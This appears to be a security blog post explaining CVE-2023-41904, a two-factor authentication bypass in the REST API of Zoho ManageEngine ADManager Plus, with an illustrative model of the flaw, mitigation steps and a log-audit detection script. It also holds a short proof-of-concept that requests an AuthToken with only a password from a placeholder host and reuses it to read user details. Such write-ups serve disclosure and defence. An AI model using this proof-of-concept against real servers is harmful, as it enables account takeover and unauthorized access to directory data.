CVE-2023-41904 - 2FA Bypass in Zoho ManageEngine ADManager Plus (REST API Exploit Guide)

Zoho ManageEngine ADManager Plus is a popular tool for managing Active Directory environments. In late 2023, a critical vulnerability was disclosed—CVE-2023-41904—allowing attackers to completely bypass two-factor authentication (2FA) for REST API calls. This could lead to unauthorized access, credential theft, or account takeover, significantly compromising business security.

This post will walk you through the vulnerability, including a technical breakdown, example exploit, and references, all in straightforward terms.

What is CVE-2023-41904?

CVE-2023-41904 is an authentication bypass vulnerability in Zoho ManageEngine ADManager Plus, impacting all versions before build 7203. The flaw lets threat actors generate AuthTokens via the REST API without completing the 2FA process that is supposed to be enforced.

In simpler words: An attacker can log in as any 2FA-enabled user, skipping an important security step intended to protect accounts.

More about this CVE

- Zoho Advisory
- NIST NVD CVE Entry

Receive an AuthToken allowing API access.

The bug: The REST API endpoint /RestAPI/Logon fails to enforce the 2FA validation for AuthToken generation—meaning if an attacker only sends a username and password, the system still generates a valid AuthToken.
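To make the logic flaw concrete, here is an added, self-contained Python model of a logon handler (this is illustrative code written for this post, not ADManager Plus's own code). The user store, the password hashing and the fixed six-digit second factor are all constructed stand-ins. vulnerable_logon() mirrors the reported behaviour: a correct password alone mints an AuthToken. fixed_logon() shows the property a patched endpoint must have: for a 2FA-enabled user, no token exists until the second factor has been verified server-side in the same request.

```python
import hashlib
import hmac
import secrets

# Constructed demo user store. Real systems use a proper password hash
# (bcrypt/argon2) and TOTP; the fixed "otp" here merely stands in for a
# verified second factor so the example runs offline.
_USERS = {
    "alice": {
        "pw_hash": hashlib.sha256(b"correct horse").hexdigest(),
        "two_factor_enabled": True,
        "otp": "482913",  # constructed value
    },
    "bob": {
        "pw_hash": hashlib.sha256(b"hunter2").hexdigest(),
        "two_factor_enabled": False,
        "otp": None,
    },
}


def _password_ok(username, password):
    """Constant-time comparison of the supplied password's digest."""
    user = _USERS.get(username)
    if user is None:
        return False
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(digest, user["pw_hash"])


def vulnerable_logon(username, password):
    """Models the flaw: a valid password alone yields an AuthToken, even for a
    2FA-enabled user. The response shape follows the page's sample output."""
    if not _password_ok(username, password):
        return {"message": "Invalid credentials"}
    return {"AuthToken": secrets.token_hex(16), "message": "User Authenticated"}


def fixed_logon(username, password, otp=None):
    """Hardened model: the token is issued only after every factor the user's
    policy requires has been verified by the server in this request."""
    if not _password_ok(username, password):
        return {"message": "Invalid credentials"}
    user = _USERS[username]
    if user["two_factor_enabled"]:
        if otp is None:
            # Do not mint anything here; the client must present the second factor.
            return {"message": "Second factor required"}
        if not hmac.compare_digest(otp, user["otp"]):
            return {"message": "Invalid second factor"}
    return {"AuthToken": secrets.token_hex(16), "message": "User Authenticated"}


if __name__ == "__main__":
    print("vulnerable:", vulnerable_logon("alice", "correct horse"))
    print("fixed, no otp:", fixed_logon("alice", "correct horse"))
    print("fixed, otp:", fixed_logon("alice", "correct horse", "482913"))
```

The design point is that the 2FA check has to gate token issuance on the server; an endpoint that trusts the client to say "2FA done" (or that simply skips the check for API callers, as the REST path here did) is bypassable no matter how the web UI behaves.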

PoC: Exploiting the 2FA Bypass

Disclaimer: This article is for educational purposes. Always have authorization before testing these techniques!

Let’s assume you know (or can guess) a user's basic credentials.

1. Make a REST API request to the logon endpoint (no 2FA token needed)

import requests

url = "https://target.host:808/RestAPI/Logon"
headers = {'Content-Type': 'application/json'}
data = {
    "USERNAME": "victimuser",
    "PASSWORD": "userpassword"
    # No 2FA token provided!
}

# Only a username and password are sent; the vulnerable endpoint still issues a token
response = requests.post(url, json=data, headers=headers, verify=False, timeout=10)

print(response.json())

Expected output

{
    "AuthToken": "some-long-access-token",
    "message": "User Authenticated"
}

2. Use the AuthToken for further API calls

import requests

# Reuse the AuthToken returned by the logon call above
headers = {
    'Authorization': 'Bearer some-long-access-token',
    'Content-Type': 'application/json'
}

user_info_url = "https://target.host:808/RestAPI/UserDetails?USERNAME=victimuser"
user_response = requests.get(user_info_url, headers=headers, verify=False, timeout=10)

print(user_response.json())

If successful, you can access restricted/admin data.

Why is This So Serious?

- Impact: Complete bypass of 2FA == huge risk. Attackers can take over accounts even with 2FA turned on.
- Scope: Affects anyone running ADManager Plus prior to v7203.
- Attack Simplicity: Minimal technical skill required—just basic knowledge of REST APIs and Python.

Mitigation

1. Update: Apply the patch provided by Zoho (Security Updates Download).
2. Audit: Review logs for unrecognized REST API logins.
3. Network Controls: Restrict access to the ADManager Plus web interface and API to trusted IPs only.
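The audit and network-control steps can be turned into a repeatable check. The Python below is an added example written for this post, not a Zoho tool: it parses a constructed key=value log format (ADManager Plus's real log layout differs, so the regex must be adapted), flags every successful REST API logon by a 2FA-enabled user that is not preceded by a 2FA verification event within a short window, flags logons from outside the trusted networks, and includes a helper that compares a build number against the affected range stated above. The user list and network ranges are assumptions for the demo.

```python
import ipaddress
import re
from datetime import datetime

# Constructed sample lines; the format is invented for this example.
SAMPLE_LOG = """\
2023-09-27T10:00:05Z src=10.0.0.5 user=alice event=TwoFactor.Verified result=success
2023-09-27T10:00:07Z src=10.0.0.5 user=alice event=RestAPI.Logon result=success
2023-09-27T10:15:40Z src=203.0.113.9 user=alice event=RestAPI.Logon result=success
2023-09-27T10:16:02Z src=10.0.0.7 user=bob event=RestAPI.Logon result=success
2023-09-27T10:20:00Z src=10.0.0.5 user=alice event=RestAPI.Logon result=failure
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) "
    r"event=(?P<event>\S+) result=(?P<result>\S+)$"
)


def parse_log(text):
    """Turn log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def find_suspicious_logons(events, two_factor_users, trusted_nets, window_seconds=120):
    """One finding per successful REST API logon that lacks a preceding 2FA
    verification for a 2FA-enabled user, or that comes from an untrusted network."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    verified = [e for e in events
                if e["event"] == "TwoFactor.Verified" and e["result"] == "success"]
    findings = []
    for e in events:
        if e["event"] != "RestAPI.Logon" or e["result"] != "success":
            continue
        reasons = []
        if e["user"] in two_factor_users:
            # A 2FA verification must exist for the same user shortly before the logon
            recent = any(
                v["user"] == e["user"]
                and 0 <= (e["ts"] - v["ts"]).total_seconds() <= window_seconds
                for v in verified
            )
            if not recent:
                reasons.append("no 2FA verification before REST logon")
        src = ipaddress.ip_address(e["src"])
        if not any(src in n for n in nets):
            reasons.append("source outside trusted networks")
        if reasons:
            findings.append({"ts": e["ts"].isoformat(), "user": e["user"],
                             "src": e["src"], "reasons": reasons})
    return findings


def is_vulnerable_build(build):
    """Builds before 7203 are affected, per the scope stated on this page."""
    return int(build) < 7203


if __name__ == "__main__":
    for f in find_suspicious_logons(parse_log(SAMPLE_LOG), {"alice"}, ["10.0.0.0/8"]):
        print(f)
    print("build 7202 vulnerable:", is_vulnerable_build(7202))
```

On the sample data only the 10:15:40 logon is reported, with both reasons: alice is 2FA-enabled but no verification event precedes that logon, and 203.0.113.9 is outside the trusted range. Once the patch is applied the first condition should stop firing; the network check remains useful regardless of version.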

References

- Zoho ManageEngine Security Advisories
- CVE-2023-41904 @ NIST
- Zoho Download Page

Takeaway

CVE-2023-41904 is a high-severity, easy-to-exploit bug in Zoho’s enterprise software. The fix is straightforward: update to the latest version. If you run ADManager Plus and haven’t applied the patch yet, do so as soon as you can. Don’t rely on 2FA alone—always keep critical software up to date.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/28/2023 17:41:00 UTC